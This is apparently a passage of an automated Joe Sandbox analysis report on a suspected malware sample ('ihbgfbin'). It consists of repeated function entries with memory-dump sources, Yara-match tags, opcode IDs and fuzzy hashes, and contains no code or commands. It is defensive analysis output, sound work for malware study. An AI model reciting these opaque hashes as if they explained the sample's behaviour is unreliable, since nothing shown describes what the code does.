                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 7 d5fc90-d5fca5 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 6 d5fc60-d5fc75 LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
control_flow_graph 9 d5fdc0-d5fdd5 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
• Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
• Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
• Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
control_flow_graph 8 d5fd8c-d5fda4 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
• Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
• Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
• Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
control_flow_graph 11 d5fed0-d5fee5 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
• Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
• Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
• Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
control_flow_graph 10 d5fea0-d5feb5 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
• Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
• Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
• Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
control_flow_graph 12 d5ffb4-d5ffc9 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
• Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
• Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
• Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
Strings
Memory Dump Source
• Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
Yara matches
Similarity
• API ID:
• String ID: h
• API String ID: 0-2439710439
• Opcode ID: 075165b18fd9f3b4bc5acd4a2c9709fb8842792709ea67660a0024d6c808ff27
• Instruction ID: f77eee6e2664df6625b163e4d2198187ea02919632482e59105157d8887227b1
• Opcode Fuzzy Hash: 075165b18fd9f3b4bc5acd4a2c9709fb8842792709ea67660a0024d6c808ff27
• Instruction Fuzzy Hash: 6351E271A00209ABDB24DF65DC81AEFB7B9EF89304F00452EE90597341E738EA4587E9
Strings
Memory Dump Source
• Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
Yara matches
Similarity
• API ID:
• String ID: (
• API String ID: 0-3887548279
• Opcode ID: c0628fd986619627b6302748f753d5ad595e4d04418077e8cefceef9e2bba27f
• Instruction ID: d40165270fcfcedd80acac774fbd393f2c8b4f1a636fb76bba10551393bf88db
• Opcode Fuzzy Hash: c0628fd986619627b6302748f753d5ad595e4d04418077e8cefceef9e2bba27f
• Instruction Fuzzy Hash: C1216070604105ABCB18CF5ADC81CAB77A9EFC4724714C15AE8098BB05E738ED91CBE8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7574933a44b0fdf8b64d52a8e9ec827446bccbfb52860849b7ddde52bd5142c4
                                                                                                                                                                                    • Instruction ID: de2ed033ce42278643d0ecb15df6f765b958d073a96daf7b0653906d73af5185
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7574933a44b0fdf8b64d52a8e9ec827446bccbfb52860849b7ddde52bd5142c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4811E7716442087BE220DA65DC82FEB73DCDF49708F00055AFA18CB281E7A5AE9583E9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: daa8aa814ac95f2f8ced5311b622f4cb67e0e31d2c296112237d25487c6ba4cf
                                                                                                                                                                                    • Instruction ID: 697f16fab74a690f05ce97b3ae80c75cc792162026cd5e876bfc473946e8d1e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: daa8aa814ac95f2f8ced5311b622f4cb67e0e31d2c296112237d25487c6ba4cf
                                                                                                                                                                                    • Instruction Fuzzy Hash: D701F5715042886FDB04DF24EC82AE677D8EF44364F04868EF818CB142E779D6618B91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 83689f81059a6b49a2024fe5df60d3a41d9544cfe624bc4d74d54462aac7b488
                                                                                                                                                                                    • Instruction ID: e90d50ebbf5f58e3ad0a79cb29ceb9f8597f2691e9ad76120241f9398c4b1d9a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 83689f81059a6b49a2024fe5df60d3a41d9544cfe624bc4d74d54462aac7b488
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2001627290030C66DB14EBE1CC82FEF773D9B44704F00459AB7496B0C2E679A698CBE5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8767d24dd5cb5df7964204619b8a838ff7632b57bff39019f86d90b73a0abc28
                                                                                                                                                                                    • Instruction ID: d0fa04a2c6bcaf01bae8be6e7381e5cca8bec23f851924a4c652d846c5d7f372
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8767d24dd5cb5df7964204619b8a838ff7632b57bff39019f86d90b73a0abc28
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E09B717452083BF61095969C83FE772CCDF49764F000056FA08D7281E5E96DD042E9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c35649d22946e5c474b606083634020b4a7a6bacc31ba0e0f9380b9cb5d833c0
                                                                                                                                                                                    • Instruction ID: b286b29d431484ac0c7716daba64a37cc93c8fbdc72a1c00db294aa7d517cf32
                                                                                                                                                                                    • Opcode Fuzzy Hash: c35649d22946e5c474b606083634020b4a7a6bacc31ba0e0f9380b9cb5d833c0
                                                                                                                                                                                    • Instruction Fuzzy Hash: FBE0D8367002107BC2209659DC46FD7B768CBC4B64F090165FA0CD7301E6289D4186E5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 38c6c326ce4ad33f05e29f6f7788b92ff59919cab33535bedbac99f45c558931
                                                                                                                                                                                    • Instruction ID: 41f32d51419d74dc4a9da0f683c996f9e5c7be6796b01064dfd11c382aa31147
                                                                                                                                                                                    • Opcode Fuzzy Hash: 38c6c326ce4ad33f05e29f6f7788b92ff59919cab33535bedbac99f45c558931
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CE0EDB660430E6F9B04CE69DC52CAB37ACEB48214B04451AFC09C3200F630F9208BA1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 464f7d1c597164a6d5357f671cdf5d26846a914594145784788906905fc075af
                                                                                                                                                                                    • Instruction ID: e8f2d5b6531cf6e7fdc51e43174f77600670f5a93a1743d7ba89319a7aa4225a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 464f7d1c597164a6d5357f671cdf5d26846a914594145784788906905fc075af
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E0863660131437C220558ADC06FD7B75CCBC5F64F09002AFE0C9B341E668AD8186E9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c40b263e171f7afe17e06ae10761000326582230c5089b313f59c0bdbc66b179
                                                                                                                                                                                    • Instruction ID: c6fc234e1bb99ff65f56378bf5e044b51cb105a8b799a7e722716a2ca120b4b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: c40b263e171f7afe17e06ae10761000326582230c5089b313f59c0bdbc66b179
                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F0AC75610209AFDB04CF59C881EDB73A9EB88750F04C519FD19CB241E774EA11CBA1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a41cd42a5fc2232a364da95367f21f738660a4e3fb78708dd8b08bff0254022e
                                                                                                                                                                                    • Instruction ID: 962367b92bd2a9ec76eb27684a3d5b6c114e4298b9661d9b67db10bb08b19143
                                                                                                                                                                                    • Opcode Fuzzy Hash: a41cd42a5fc2232a364da95367f21f738660a4e3fb78708dd8b08bff0254022e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 26E02B7181030856F764F7708D4BFD9737C8B04308F0007D9B60C661C2FB7856554A96
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 17f3b149a4332b239e0677116ac8955fb86d1c8c9f4b72f3a1a3db4a441b3775
                                                                                                                                                                                    • Instruction ID: bbd832aff0c8ef618e4166a392593e8999a7600e5c75283dd26985c2bad6ed6b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17f3b149a4332b239e0677116ac8955fb86d1c8c9f4b72f3a1a3db4a441b3775
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2D012B96001047BDE04EB88ED46FE633ADA748715F48C04AB54C8F342D239FDA08759
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7ff3bc997b7e8420044eb2aae527a3d3b88b8387f7e416a5616c9eb0b9c8c3e0
                                                                                                                                                                                    • Instruction ID: 34338f23d7e64903e0b9a54f15b02f3c0b1d2e4bbca900a8ee38a589897490cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ff3bc997b7e8420044eb2aae527a3d3b88b8387f7e416a5616c9eb0b9c8c3e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: A9C080755003087FD704EF8CDC46F5533DC9708614F044044B90C8B342D574FD508755
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429564414.000000000041B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_ihbgfbin.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
